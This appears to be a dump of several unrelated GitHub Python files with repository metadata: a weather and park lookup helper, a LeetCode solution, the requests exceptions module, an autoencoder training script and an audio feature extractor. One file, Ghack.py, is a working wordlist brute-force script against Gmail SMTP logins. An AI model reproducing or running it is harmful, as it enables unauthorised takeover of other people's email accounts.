park_url = row["url"]
city = row["addresses"][0]["city"]
latitude = row["latitude"]
longitude = row["longitude"]
latlong = latitude +"," + longitude
# temporary dictionary to append to the parks list
temp_dict = {
"name": name,
"url": park_url,
"city": city,
"latlong": latlong
}
parks.append(temp_dict)
return parks
except (KeyError, TypeError, ValueError):
return None
def lookup_weather(lat,lon):
try:
# get the weather API key environmental variable, then try to make a request
Open_weather_key = os.environ.get("Open_weather_key")
request = requests.get(f"http://api.openweathermap.org/data/2.5/weather?lat={lat}&lon={lon}&units=imperial&appid={Open_weather_key}",)
request.raise_for_status()
except requests.RequestException:
return None
try:
# format the data into a dictionary for display on the HTML page
weather_data = request.json()
# format the data into a dictionary for display on the HTML page
data = {
"temp": str(weather_data['main']['temp']),
"feels_like":str(weather_data["main"]["feels_like"]),
"description": str(weather_data['weather'][0]["description"]),
"city": weather_data["name"],
"icon": weather_data['weather'][0]['icon']
}
return data
except (KeyError, TypeError, ValueError):
return None
| [
"noreply@github.com"
] | chasesliger.noreply@github.com |
7075283b6955bdfb1a33d515a731dcf20942c77d | cbfb679bd068a1153ed855f0db1a8b9e0d4bfd98 | /leet/google/trees_and_graphs/1466_Reorder_Routes_to_Make_All_Paths_Lead_to_the_City_Zero.py | b9d29f7cfe28380b2d2c1c3fe882319eb9cf1dfb | [] | no_license | arsamigullin/problem_solving_python | 47715858a394ba9298e04c11f2fe7f5ec0ee443a | 59f70dc4466e15df591ba285317e4a1fe808ed60 | refs/heads/master | 2023-03-04T01:13:51.280001 | 2023-02-27T18:20:56 | 2023-02-27T18:20:56 | 212,953,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | import collections
from leet.microsoft.trees_and_graphs.n_ary_tree_level_order_traversal import List
class SolutionMy:
    """Count how many roads must be reversed so every city can reach city 0."""

    def minReorder(self, n: int, connections: List[List[int]]) -> int:
        # Undirected adjacency for traversal; `forward` remembers the
        # original orientation (u -> v) of every road.
        adjacency = collections.defaultdict(list)
        forward = collections.defaultdict(set)
        for u, v in connections:
            adjacency[u].append(v)
            adjacency[v].append(u)
            forward[u].add(v)
        # Iterative DFS from the capital.  When we walk an edge from a
        # child up toward its parent and the original road was NOT
        # directed child -> parent, it points away from city 0 and must
        # be reversed.
        reversals = 0
        stack = [(0, -1)]
        while stack:
            node, parent = stack.pop()
            if parent != -1 and parent not in forward[node]:
                reversals += 1
            for neighbour in adjacency[node]:
                if neighbour != parent:
                    stack.append((neighbour, node))
        return reversals
| [
"ar.smglln@gmail.com"
] | ar.smglln@gmail.com |
430bdd49a95d6b8b0dd30c7bc493d0e783feaecc | 00da73f35308b860ef9a3c6eb6cdaf8c89608f57 | /deps/requests/exceptions.py | be7eaed6b9cbfe71db625ce1da3fcb11d242380b | [
"MIT"
] | permissive | kylebebak/Requester | 32abf8a56ba0e9e42fdd25b13ce48d40a87f20e0 | 7f177bc417c45fd1792c6020543a4c6909e3ea21 | refs/heads/master | 2022-07-17T11:09:30.238568 | 2022-05-05T17:31:48 | 2022-05-05T17:38:56 | 89,746,594 | 333 | 16 | MIT | 2021-02-23T14:43:12 | 2017-04-28T21:37:08 | Python | UTF-8 | Python | false | false | 3,103 | py | # -*- coding: utf-8 -*-
"""
requests.exceptions
~~~~~~~~~~~~~~~~~~~
This module contains the set of Requests' exceptions.
"""
from urllib3.exceptions import HTTPError as BaseHTTPError
class RequestException(IOError):
    """There was an ambiguous exception that occurred while handling your
    request.
    """
    def __init__(self, *args, **kwargs):
        """Initialize RequestException with `request` and `response` objects."""
        self.response = kwargs.pop('response', None)
        self.request = kwargs.pop('request', None)
        # When only a response was supplied, borrow the request that
        # produced it so both attributes are populated.
        if self.response is not None and not self.request:
            if hasattr(self.response, 'request'):
                self.request = self.response.request
        super(RequestException, self).__init__(*args, **kwargs)
# ---------------------------------------------------------------------------
# Concrete exception types.  Everything Requests raises derives from
# RequestException, so callers can catch that single base class.
# ---------------------------------------------------------------------------
class HTTPError(RequestException):
    """An HTTP error occurred."""
class ConnectionError(RequestException):
    """A Connection error occurred."""
class ProxyError(ConnectionError):
    """A proxy error occurred."""
class SSLError(ConnectionError):
    """An SSL error occurred."""
class Timeout(RequestException):
    """The request timed out.
    Catching this error will catch both
    :exc:`~requests.exceptions.ConnectTimeout` and
    :exc:`~requests.exceptions.ReadTimeout` errors.
    """
class ConnectTimeout(ConnectionError, Timeout):
    """The request timed out while trying to connect to the remote server.
    Requests that produced this error are safe to retry.
    """
class ReadTimeout(Timeout):
    """The server did not send any data in the allotted amount of time."""
class URLRequired(RequestException):
    """A valid URL is required to make a request."""
class TooManyRedirects(RequestException):
    """Too many redirects."""
# URL/schema/header problems also subclass ValueError so malformed input
# can be caught either as a Requests error or as a plain ValueError.
class MissingSchema(RequestException, ValueError):
    """The URL schema (e.g. http or https) is missing."""
class InvalidSchema(RequestException, ValueError):
    """See defaults.py for valid schemas."""
class InvalidURL(RequestException, ValueError):
    """The URL provided was somehow invalid."""
class InvalidHeader(RequestException, ValueError):
    """The header value provided was somehow invalid."""
class ChunkedEncodingError(RequestException):
    """The server declared chunked encoding but sent an invalid chunk."""
class ContentDecodingError(RequestException, BaseHTTPError):
    """Failed to decode response content"""
class StreamConsumedError(RequestException, TypeError):
    """The content for this response was already consumed"""
class RetryError(RequestException):
    """Custom retries logic failed"""
class UnrewindableBodyError(RequestException):
    """Requests encountered an error when trying to rewind a body"""
# Warnings
class RequestsWarning(Warning):
    """Base warning for Requests."""
    pass
class FileModeWarning(RequestsWarning, DeprecationWarning):
    """A file was opened in text mode, but Requests determined its binary length."""
    pass
class RequestsDependencyWarning(RequestsWarning):
    """An imported dependency doesn't match the expected version range."""
    pass
| [
"kylebebak@gmail.com"
] | kylebebak@gmail.com |
2ac6ed87775431ddcbc4b7fa558d78fe2d909b63 | 3a3f24adfd63ff35009c1983abd07ff457afc261 | /Ghack.py | 0b6b2a2d808cf969aac493c8f69f24bada03927c | [] | no_license | lukaakul005/ghack0274 | 62fafc7e5741e1e929fb2ff77250a22c6bb3c55d | 82eed35c1b516b13659a9b4d0760b7bf3ac8a390 | refs/heads/master | 2021-05-21T03:42:14.562557 | 2020-04-02T17:52:55 | 2020-04-02T17:52:55 | 252,527,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | import smtplib
import time
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
n = 0
user = input("Enter the target's email address: ")
passfile = input("Enter the password file name: ")
passfile = open(passfile, "r")
for password in passfile:
try:
smtpserver.login(user, password)
print ("[+] Password Found: %s" % password)
break;
except smtplib.SMTPAuthenticationError:
print(n + 1)
print("Incorect password: " + password)
n += 1
time.sleep(5)
#70hr for 50k passwords
| [
"noreply@github.com"
] | lukaakul005.noreply@github.com |
a4ea9a9741282126ca5996726e4d99dec6bded63 | a151410b77d4d7151376b6e0be15ad15e49b7c14 | /results/quantum-dots/two-dim-quantum-dots/ground-state/tdho_system.py | e95b015e657d035129035894ef61983434f9a441 | [] | no_license | Schoyen/master-thesis | d3b5b0cb20bf0d8b3fbf2cf70eec63d6484b21d7 | 5c599431d9a000d767372b05580312f223883220 | refs/heads/master | 2023-04-19T03:20:08.076633 | 2021-04-29T11:16:26 | 2021-04-29T11:16:26 | 140,681,415 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | import os
import numpy as np
from quantum_systems import TwoDimensionalHarmonicOscillator
from hartree_fock import RHF
from hartree_fock.mix import DIIS
os.environ["QS_CACHE_TDHO"] = "1"
def cache_large_system(*args, **kwargs):
    """Build a spin-free, non-anti-symmetrized 2D harmonic-oscillator system.

    The QS_CACHE_TDHO environment flag set above lets quantum_systems cache
    the expensive integrals between runs.
    """
    system = TwoDimensionalHarmonicOscillator(*args, **kwargs)
    system.setup_system(
        verbose=True, add_spin=False, anti_symmetrize=False
    )
    return system
def get_tdho(*args, add_spin=True, **kwargs):
    """Construct and set up a 2D harmonic-oscillator system.

    add_spin toggles spin doubling of the basis (default True).
    """
    oscillator = TwoDimensionalHarmonicOscillator(*args, **kwargs)
    oscillator.setup_system(verbose=True, add_spin=add_spin)
    return oscillator
def get_rhf_tdho(*args, tol=1e-7, **kwargs):
    """Run a DIIS-accelerated RHF ground-state calculation on the cached
    oscillator system and return the converged solver."""
    system = cache_large_system(*args, **kwargs)
    solver = RHF(system, verbose=True, mixer=DIIS)
    solver.compute_ground_state(change_system_basis=True, tol=tol)
    return solver
| [
"oyvindschoyen@gmail.com"
] | oyvindschoyen@gmail.com |
a3aadbb6552e2b1f21e9e6b8b2892f95137b8f56 | f1d3393e741bb6bc1d0bec56b8466116d91206d8 | /NER-action/data_loader.py | ca0dd52b79aa68fe2903d1ca9ab7fafe7e758f56 | [] | no_license | wanghr873/NER- | 185d58bac94e800bd755ee4942887e792b646de2 | f88599fd7e01ad2303d8b44a32765e6bc61e310d | refs/heads/master | 2022-11-08T09:41:38.231942 | 2020-06-26T01:25:01 | 2020-06-26T01:25:01 | 275,047,971 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,038 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
#微信公众号 AI壹号堂 欢迎关注
#Author bruce
import codecs
import data_utils
def load_sentences(path):
    """Load a whitespace-separated tagged corpus.

    Each non-empty line holds at least a token and a tag separated by
    whitespace; blank lines separate sentences.  Returns a list of
    sentences, where each sentence is a list of [token, tag, ...] lists.
    """
    sentences = []
    # Accumulates the tokens of the sentence currently being read.
    sentence = []
    for line in codecs.open(path, 'r', encoding='utf-8'):
        line = line.strip()
        if not line:
            # Blank line: flush the finished sentence (if any).
            if len(sentence) > 0:
                sentences.append(sentence)
            sentence = []
        else:
            # BUG FIX (dead code removed): the original also skipped lines
            # whose first character was a space, but after strip() a
            # non-empty line can never start with a space, so that branch
            # was unreachable.
            word = line.split()
            assert len(word) >= 2
            sentence.append(word)
    # Flush the last sentence when the file does not end with a blank line.
    if len(sentence) > 0:
        sentences.append(sentence)
    return sentences
def update_tag_scheme(sentences, tag_scheme):
    """Convert every sentence's tags to the requested scheme, in place.

    Validates that the input tags are BIO-encoded, then either keeps them
    as BIO or converts them to BIOES.  Raises Exception for invalid input
    tags or an unknown target scheme.
    """
    for i, s in enumerate(sentences):
        tags = [w[-1] for w in s]
        if not data_utils.check_bio(tags):
            s_str = "\n".join(" ".join(w) for w in s)
            raise Exception("输入的句子应为BIO编码,请检查输入句子%i:\n%s" % (i, s_str))
        if tag_scheme == "BIO":
            for word, new_tag in zip(s, tags):
                word[-1] = new_tag
        # BUG FIX: this branch used to be a separate `if`, so a valid
        # "BIO" request fell through to the `else` below and raised after
        # already rewriting the tags.  `elif` restores the intended
        # mutually-exclusive dispatch.
        elif tag_scheme == "BIOES":
            new_tags = data_utils.bio_to_bioes(tags)
            for word, new_tag in zip(s, new_tags):
                word[-1] = new_tag
        else:
            raise Exception("非法目标编码")
#
# def word_mapping(sentences):
# """
# 构建字典
# :param sentences:
# :return:
# """
# word_list = [[x[0] for x in s] for s in sentences]
# dico = data_utils.create_dico(word_list)
# dico['<PAD>'] = 10000001
# dico['<UNK>'] = 10000000
# word_to_id, id_to_word = data_utils.create_mapping(dico)
# return dico, word_to_id, id_to_word
#
# def tag_mapping(sentences):
# """
# 构建标签字典
# :param sentences:
# :return:
# """
# tag_list = [[x[1] for x in s] for s in sentences]
# dico = data_utils.create_dico(tag_list)
# tag_to_id, id_to_tag = data_utils.create_mapping(dico)
# return dico, tag_to_id, id_to_tag
#
# def prepare_dataset(sentences, word_to_id, tag_to_id, train=True):
# """
# 数据预处理,返回list其实包含
# -word_list
# -word_id_list
# -word char indexs
# -tag_id_list
# :param sentences:
# :param word_to_id:
# :param tag_to_id:
# :param train:
# :return:
# """
# none_index = tag_to_id['O']
#
# data = []
# for s in sentences:
# word_list = [ w[0] for w in s]
# word_id_list = [word_to_id[w if w in word_to_id else '<UNK>'] for w in word_list]
# segs = data_utils.get_seg_features("".join(word_list))
# if train:
# tag_id_list = [tag_to_id[w[-1]] for w in s]
# else:
# tag_id_list = [none_index for w in s]
# data.append([word_list, word_id_list, segs,tag_id_list])
#
# return data
if __name__ == "__main__":
    # Smoke test: load the dev split and confirm parsing succeeds; the
    # commented lines exercise the (currently disabled) mapping helpers.
    path = "data/ner.dev"
    sentences = load_sentences(path)
    print('load_sentences')
    # update_tag_scheme(sentences,"BIOES")
    # _, word_to_id, id_to_word = word_mapping(sentences)
    # _, tag_to_id, id_to_tag = tag_mapping(sentences)
    # dev_data = prepare_dataset(sentences, word_to_id, tag_to_id)
    # data_utils.BatchManager(dev_data, 120)
| [
"noreply@github.com"
] | wanghr873.noreply@github.com |
25e3c77c55c822ccaa6161f2c5af8d82a68c33dd | a5d51c2dc35b6fbbff74707be2d446d25f337227 | /Pytorch/RDA/RDA.py | aad6c9f62bbbd8f23c7990e4dd85334d4603998d | [] | no_license | huiminren/RobustVAE | 5ed8223748be333374070cfb5172bfbcd1250991 | e82a33f6d4f03b2e3c7f176fbf6f05ce6524d0cd | refs/heads/master | 2023-05-23T01:13:48.950054 | 2021-06-07T01:20:10 | 2021-06-07T01:20:10 | 161,849,001 | 11 | 3 | null | null | null | null | UTF-8 | Python | false | false | 8,261 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 25 13:45:45 2019
@author: huiminren
"""
import torch
import torch.utils.data as Data
from torchvision.utils import save_image
from torch import nn
import matplotlib.pyplot as plt
import numpy as np
import os
import time
from BasicAutoencoder.DA import AE_Net as AENET
from BasicAutoencoder.DA import Autoencoder
from BasicAutoencoder.VAE import VAE_Net
from BasicAutoencoder.VAE import Autoencoder2
from shrink import l1shrink as SHR
import glob
from skimage.util import random_noise
from utils import *
def corrupt(X_in, corNum=10):
    """Return a copy of X_in with corNum randomly chosen entries per row
    flipped between 0 and 1 (salt-and-pepper style corruption).

    The input tensor is left untouched; duplicate draws may flip the same
    cell back, so a row can end up with fewer than corNum changes.
    """
    noisy = X_in.clone()
    n_rows, n_cols = noisy.shape[0], noisy.shape[1]
    for row in range(n_rows):
        for col in np.random.randint(0, n_cols, size=corNum):
            noisy[row, col] = 0 if noisy[row, col] > 0.5 else 1
    return noisy
class RobustDAE(object):
    """
    @Original author: Chong Zhou
    Des:
        X = L + S
        L is a non-linearly low rank matrix and S is a sparse matrix.
        argmin ||L - Decoder(Encoder(L))|| + ||S||_1
        Use Alternating projection to train model
    """
    def __init__(self,lambda_=1.0,error = 1e-7,use_cuda=True, nz=100, ngf=64, ndf=64, nc=3):
        # lambda_ weights the ||S||_1 sparsity term; error is the convergence
        # tolerance used by fit(); nz/ngf/ndf/nc are forwarded to the AENET
        # architecture (latent size, feature-map counts, channel count).
        self.errors = []
        self.error = error
        self.lambda_ = lambda_
        self.ae = Autoencoder()
        cuda = use_cuda and torch.cuda.is_available()
        self.device = torch.device("cuda" if cuda else "cpu") #asign cuda
        self.dae = AENET(nc, ngf, ndf, nz)
        if torch.cuda.device_count() > 1: # if have multiple GPUs, set data parallel to model
            print("Let's use", torch.cuda.device_count(), "GPUs!")
            self.dae = nn.DataParallel(self.dae)
        self.dae.to(self.device)
        return
    def fit(self,train_dataset, path, model_name, iteration = 30, batch_size = 128,
            learning_rate = 1e-4, epochs = 20, verbose=False):
        # Alternating projection loop: (1) train the autoencoder on the
        # low-rank part L = X - S, (2) L1-shrink the residual X - L into S.
        # Saves the trained autoencoder and example images on the last
        # iteration and returns the final L.
        # Initialize L, S dtyp: tensor
        X = train_dataset.tensors[0]
        self.L = torch.zeros(X.size())
        self.S = torch.zeros(X.size())
        # Calculate mu(shrinkage operator)
        X_numpy = X.detach().cpu().numpy()
        # mu = (X_numpy.size)/(4.0*np.linalg.norm(X_numpy,1))
        mu = (X_numpy.size)/(4.0*np.linalg.norm(X_numpy.reshape(-1,X_numpy.shape[-1]*X_numpy.shape[-1]),1))
        print("Shrink parameter:", self.lambda_/mu)
        LS0 = self.L + self.S
        XFnorm = torch.norm(X,'fro') # Frobenius norm
        if verbose:
            print("X shape:",X.shape)
            print("mu:",mu)
            print("XFnorm:", XFnorm)
        for it in range (iteration):
            print('iteration:',it)
            if verbose:
                print("Out iteration:", it)
            self.L = X - self.S
            # Convert L to trian_loader
            ae_dataset = Data.TensorDataset(self.L)
            ae_train_loader = Data.DataLoader(dataset = ae_dataset, batch_size = batch_size, shuffle = True)
            # Use L to train autoencoder and get optimized(reconstructed) L
            model = self.ae.train(device = self.device, model = self.dae,
                                  train_loader = ae_train_loader, learning_rate = learning_rate,epochs = epochs)
            recon_loader = Data.DataLoader(dataset = ae_dataset,batch_size = 1, shuffle = False)
            self.L = self.ae.reconstruction(self.device, model, recon_loader).detach().cpu()
            # Alternate project of S
            self.S = SHR.shrink(self.lambda_/mu,(X-self.L).reshape(-1)).reshape(X.shape)
            # Break criterion 1: L and S are close enought to X
            c1 = torch.norm((X - self.L - self.S),'fro') / XFnorm
            # Break criterion 2: there is no change for L and S
            c2 = np.min([mu,np.sqrt(mu)]) * torch.norm(LS0 - self.L - self.S) / XFnorm
            self.errors.append(c1)
            if it == iteration - 1:
                print("save autoencoder:")
                torch.save(model.state_dict(), path+'model_rda_'+model_name+'.pth')
                # plots
                print("plot examples of reconstruction:")
                self.plot(path,X[:10],self.L[:10])
            if verbose:
                print("c1:",c1)
                print("c2:",c2)
            if c1 < self.error and c2 < self.error:
                print("early break")
                break
            LS0 = self.L + self.S
        return self.L
    def plot(self,path,view_data,decoded_data):
        # Save the first few raw inputs and their reconstructions as image
        # grids for visual inspection.
        save_image(view_data.data, path+'raw_face.jpg',nrow=10, padding=2)
        save_image(decoded_data.data, path+'recon_face.jpg',nrow=10, padding=2)
        # # initialize figure
        # f, a = plt.subplots(2, 10, figsize=(5, 2)) #
        # for i in range(10):
        #     a[0][i].imshow(np.transpose(view_data.data.numpy()[i],(1,2,0)))
        #     a[0][i].set_xticks(()); a[0][i].set_yticks(())
        #     a[1][i].clear()
        #     a[1][i].imshow(np.transpose(decoded_data.data.numpy()[i],(1,2,0)))
        #     a[1][i].set_xticks(()); a[1][i].set_yticks(())
        # plt.savefig(path+"eg_recon.png")
        # plt.show()
#===================================================
def main(lambda_, noise_factor, debug=True):
    """Run the RDA-denoise + VAE-generate pipeline for one setting.

    Loads the CelebA crops, adds salt-and-pepper noise, trains the robust
    autoencoder to split the data into L + S, then trains a VAE on the
    recovered L and writes reconstructions/generations plus the elapsed
    time under rda/lambda_<l>/noise_<n>/.  debug=True shrinks all epoch
    counts to 1 for a quick smoke run.
    """
    start_time = time.time()
    torch.manual_seed(595)
    ngf = 64
    ndf = 64
    nz = 100
    nc = 3
    learning_rate = 1e-4
    batch_size = 128
    iteration = 10
    epochs = 20
    vae_epochs = 200
    if debug:
        iteration = 1
        epochs = 1
        vae_epochs = 1
    # Build the nested output directory rda/lambda_<l>/noise_<n>/.
    path = "rda/"
    if not os.path.isdir(path):
        os.mkdir(path)
    # NOTE(review): this second check repeats the one above — harmless but
    # redundant.
    if not os.path.exists(path):
        os.mkdir(path)
    path = path+"lambda_"+str(lambda_)+"/"
    if not os.path.exists(path):
        os.mkdir(path)
    path = path+"noise_"+str(noise_factor)+"/"
    if not os.path.exists(path):
        os.mkdir(path)
    # Load every CelebA crop and corrupt it with salt-and-pepper noise,
    # then move to NCHW float32 tensors for torch.
    data_files = glob.glob(os.path.join("./img_align_celeba", "*.jpg"))
    data_files = sorted(data_files)
    data_files = np.array(data_files)
    x_train = np.array([get_image(data_file, 148) for data_file in data_files])
    x_train_noisy = random_noise(x_train, mode='s&p', amount = noise_factor)
    x_train_noisy = np.transpose(x_train_noisy,(0,3,1,2)).astype(np.float32)
    x_train_noisy = torch.tensor(x_train_noisy)
    train_dataset = Data.TensorDataset(x_train_noisy)
    print("RDA denoising:")
    rda = RobustDAE(lambda_ = lambda_, nz = nz, ngf = ngf, ndf = ndf, nc = nc)
    L = rda.fit(train_dataset, path = path, model_name = str(noise_factor),
                iteration = iteration, batch_size = batch_size,
                learning_rate = learning_rate, epochs = epochs)
    # Train a VAE on the recovered low-rank part L.
    vae_dataset = Data.TensorDataset(L)
    vae_loader = Data.DataLoader(vae_dataset, batch_size=128, shuffle=True,num_workers=2)
    # load Neural Network
    net = VAE_Net(nc, ngf, ndf, nz)
    if torch.cuda.device_count() > 1: # if have multiple GPUs, set data parallel to model
        print("Let's use", torch.cuda.device_count(), "GPUs!")
        net = nn.DataParallel(net)
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    net.to(device)
    print("VAE generation:")
    # train model
    vae = Autoencoder2()
    model = vae.train(device = device, model = net, train_loader = vae_loader,
                      learning_rate = learning_rate, epochs = vae_epochs)
    # get reconstruction
    recon_loader = Data.DataLoader(vae_dataset[:100], batch_size=1, shuffle=False,num_workers=2)
    vae.reconstruction(device=device, model=model, dataloader=recon_loader)
    # get generation
    vae.generation_eg(device=device, model=model, path=path)
    np.save(path+'running_time.npy',np.array(time.time()-start_time))
if __name__ == "__main__":
    # Grid-search driver: the commented lists are the full experimental
    # sweeps; the active single-element lists run one setting in debug mode.
    lambdas = [300]#[1, 10, 50, 70, 100, 150]
    for lambda_ in lambdas:
        noise_factors = [.2]#[.0, .05, .1, .15, .2, .25, .3, .35, .4, .45, .5]
        for noise_factor in noise_factors:
            print(noise_factor)
            main(lambda_=lambda_, noise_factor = noise_factor, debug=True)
| [
"ramonarhm07@gmail.com"
] | ramonarhm07@gmail.com |
6c95a37e15e071cb1aa8402bc655919c7ec47651 | 2872f011134b482dbbddee2e04fcaf716b9d2241 | /spk_id/minivoxceleb/process.py | e845c1ee58e4ee9c2d184c7d70016c863868491b | [
"MIT"
] | permissive | jac002020/maso | 535d2543e2711629124df1371a22cce823b3855d | 0a721093684e19a0eeca268cd7953126c7b5a24e | refs/heads/master | 2022-03-29T12:55:56.789777 | 2019-11-19T15:37:50 | 2019-11-19T15:37:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | import os
import numpy as np
# Assign a numeric id to each speaker (first 4 chars of the filename) and
# record that id for every utterance across both splits.  The original
# duplicated the identical loop for "train" and "test"; the logic is now
# shared, preserving the same assignment order and output.
spkid = {}
utt2spk = {}
count = 0
for split in ("train", "test"):
    for file in os.listdir(split):
        spk = file[:4]
        if spk not in spkid:
            # First time we see this speaker: allocate the next id.
            spkid[spk] = count
            count += 1
        utt2spk[file] = spkid[spk]
print(spkid)
np.save("utt2spk.npy", utt2spk)
| [
"joshinh@gmail.com"
] | joshinh@gmail.com |
44d50c2a1e690a7070bc6b5edbee498c65bb711e | 2f07f8da841b991081dce5b81b78f462f5e75d21 | /chatbot/settings.py | 1503cd9a5d979480738a58cc804375f44773db7d | [] | no_license | antibagr/telegram-bot-template | 7a76bbb1ef083bfbceb17d87e40e02389ba46c88 | dce78f4476bd2a333d598bd055ff81d929d84bc5 | refs/heads/master | 2023-07-05T17:17:31.101438 | 2021-08-17T23:23:06 | 2021-08-17T23:23:06 | 396,156,088 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | from pathlib import Path
from pydantic import BaseSettings
class Settings(BaseSettings):
    """Environment-driven bot configuration, loaded from a .env file."""
    DEBUG: bool
    # Project root, derived from this file's location.
    BASE_DIR: Path = Path(__file__).resolve().parent
    BOT_TOKEN: str
    BOT_USERNAME: str
    # pass user_id of a user who has
    # the administrator privileges
    ADMIN_ID: int = 0
    # pass the chat_id of a chat
    # where all exceptions will be sent
    ERROR_CHAT_ID: int = 0
    # PostgreSQL connection settings.
    PG_HOST: str = ''
    PG_USER: str = ''
    PG_PASSWORD: str = ''
    PG_DATABASE: str = ''
    PG_PORT: int = 5432
    # Redis connection settings.
    REDIS_HOST: str = ''
    REDIS_PORT: int = 6937
    class Config:
        # pydantic BaseSettings: read values from .env, UTF-8 encoded.
        env_file = '.env'
        env_file_encoding = 'utf-8'
settings = Settings()
| [
"abagraynov@cindicator.com"
] | abagraynov@cindicator.com |
83e063a335e91ced911cc90c1c947aaf1fdf0573 | 100e4f1cec1816249862ac3284ac0b98c549827d | /formants_pitch.py | a30271bbc84c432b9b49fa32a873cacb1dae0e4e | [] | no_license | shrutikshirsagar/Sound_recognition | 59adefce65e9eb41f4e1f01bbf4475de39076e81 | c0181a0d8b86f3b8322afa5272c3a16962ce7cc4 | refs/heads/main | 2023-03-12T11:37:52.051127 | 2021-03-02T19:00:27 | 2021-03-02T19:00:27 | 316,301,735 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,855 | py | import matplotlib.pyplot as plt
import librosa
import numpy as np
import librosa.display
from surfboard.sound import Waveform
import numpy as np
import os
import pandas as pd
# Extract a 35-dimensional acoustic feature vector per audio file
# (formants, formant spacings, and five-number statistics of F0, RMS
# energy, spectral centroid, bandwidth and flatness), then dump the
# stacked matrix to CSV.
path = '//media/shruti/Data/Internship_data/Experiment/Indoor_16Khz/Fire_alarm/'
final_f = np.empty((0, 35))
for f in os.listdir(path):
    filename = os.path.join(path,f)
    print(filename)
    # Load at the file's native sampling rate.
    y, sr = librosa.load(filename, sr=None)
    print(y.shape)
    # NOTE(review): surfboard is told sample_rate=44100 while librosa loads
    # with sr=None (native rate) — confirm the corpus really is 44.1 kHz.
    sound = Waveform(path=filename, sample_rate=44100)
    # Formants F1–F4, each reshaped to (1, 1) for the final hstack.
    formants = sound.formants()
    F1 = np.asarray([formants['f1']])
    F1 = F1[:,None]
    F2 = np.asarray([formants['f2']])
    F2 = F2[:,None]
    F3 = np.asarray([formants['f3']])
    F3 = F3[:,None]
    F4 = np.asarray([formants['f4']])
    F4 = F4[:,None]
    # Pairwise formant spacings (differences, despite the original "F1/F2"
    # labels suggesting ratios).
    H1 = F2 - F1
    H2 = F3-F1
    H3 = F4 - F1
    H4 = F3 - F2
    H5 = F4 - F2
    H6 = F4 - F3
    # F0 (pitch) statistics over the non-zero pitch-track bins.
    pitches, magnitudes = librosa.core.piptrack(y=y, sr=sr, fmin=75, fmax=5000)
    F0 = pitches[np.nonzero(pitches)]
    F0 = F0[:, None]
    mean_F0 = np.mean(F0, axis = 0)
    mean_F0 = mean_F0[:,None]
    print(mean_F0)
    std_F0 = np.std(F0, axis = 0)
    std_F0 = std_F0[:,None]
    print(std_F0)
    min_F0 = np.min(F0, axis = 0)
    max_F0 = np.max(F0, axis = 0)
    range_F0 = max_F0-min_F0
    range_F0 = range_F0[:,None]
    min_F0 = min_F0[:,None]
    print(min_F0)
    max_F0 = max_F0[:,None]
    print(max_F0)
    print(range_F0)
    # Intensity statistics over the frame-wise RMS energy.
    rms_i = librosa.feature.rms(y=y)
    mean_rms = np.mean(rms_i, axis = 1)
    std_rms = np.std(rms_i, axis = 1)
    min_rms = np.min(rms_i, axis = 1)
    max_rms = np.max(rms_i, axis = 1)
    range_rms = max_rms-min_rms
    mean_rms = mean_rms[:,None]
    std_rms = std_rms[:,None]
    min_rms = min_rms[:,None]
    max_rms = max_rms[:,None]
    range_rms = range_rms[:,None]
    # Spectral centroid statistics.
    cent = librosa.feature.spectral_centroid(y=y, sr=sr)
    mean_cent = np.mean(cent, axis = 1)
    std_cent = np.std(cent, axis = 1)
    min_cent = np.min(cent, axis = 1)
    max_cent = np.max(cent, axis = 1)
    range_cent = max_cent-min_cent
    mean_cent = mean_cent[:,None]
    std_cent = std_cent[:,None]
    min_cent = min_cent[:,None]
    max_cent = max_cent[:,None]
    range_cent = range_cent[:,None]
    # Spectral bandwidth statistics.
    spec_bw = librosa.feature.spectral_bandwidth(y=y, sr=sr)
    mean_spec_bw = np.mean(spec_bw, axis = 1)
    std_spec_bw = np.std(spec_bw, axis = 1)
    min_spec_bw = np.min(spec_bw, axis = 1)
    max_spec_bw = np.max(spec_bw, axis = 1)
    range_spec_bw = max_spec_bw-min_spec_bw
    mean_spec_bw = mean_spec_bw[:,None]
    std_spec_bw = std_spec_bw[:,None]
    min_spec_bw = min_spec_bw[:,None]
    max_spec_bw = max_spec_bw[:,None]
    range_spec_bw = range_spec_bw[:,None]
    # Magnitude spectrogram (only needed by the disabled spectral-contrast
    # features; currently unused).
    S = np.abs(librosa.stft(y))
    # Spectral flatness statistics.
    flatness = librosa.feature.spectral_flatness(y=y)
    mean_flatness = np.mean(flatness, axis = 1)
    std_flatness = np.std(flatness, axis = 1)
    min_flatness= np.min(flatness, axis = 1)
    max_flatness = np.max(flatness, axis = 1)
    range_flatness = max_flatness-min_flatness
    mean_flatness = mean_flatness[:,None]
    std_flatness = std_flatness[:,None]
    min_flatness = min_flatness[:,None]
    max_flatness = max_flatness[:,None]
    range_flatness = range_flatness[:,None]
    print( F1.shape, F2.shape, F3.shape, F4.shape, H1.shape, H2.shape, H3.shape, H4.shape, H5.shape, H6.shape)
    print(mean_F0.shape, std_F0.shape, min_F0.shape, max_F0.shape, range_F0.shape)
    print(mean_rms.shape, std_rms.shape, min_rms.shape, max_rms.shape, range_rms.shape)
    print(mean_cent.shape, std_cent.shape, min_cent.shape, max_cent.shape, range_cent.shape)
    print(mean_spec_bw.shape, std_spec_bw.shape, min_spec_bw.shape, max_spec_bw.shape, range_spec_bw.shape)
    print(mean_flatness.shape, std_flatness.shape, min_flatness.shape, max_flatness.shape, range_flatness.shape)
    # Concatenate all 35 per-file features into one row and append it.
    feat = np.hstack((F1, F2, F3, F4, H1, H2, H3, H4, H5, H6, mean_F0, std_F0, min_F0, max_F0, range_F0, mean_rms, std_rms, min_rms, max_rms, range_rms, mean_cent, std_cent, min_cent, max_cent, range_cent, mean_spec_bw, std_spec_bw, min_spec_bw, max_spec_bw, range_spec_bw, mean_flatness, std_flatness, min_flatness, max_flatness, range_flatness))
    print(feat.shape)
    final_f = np.vstack((final_f, feat))
    print(final_f.shape)
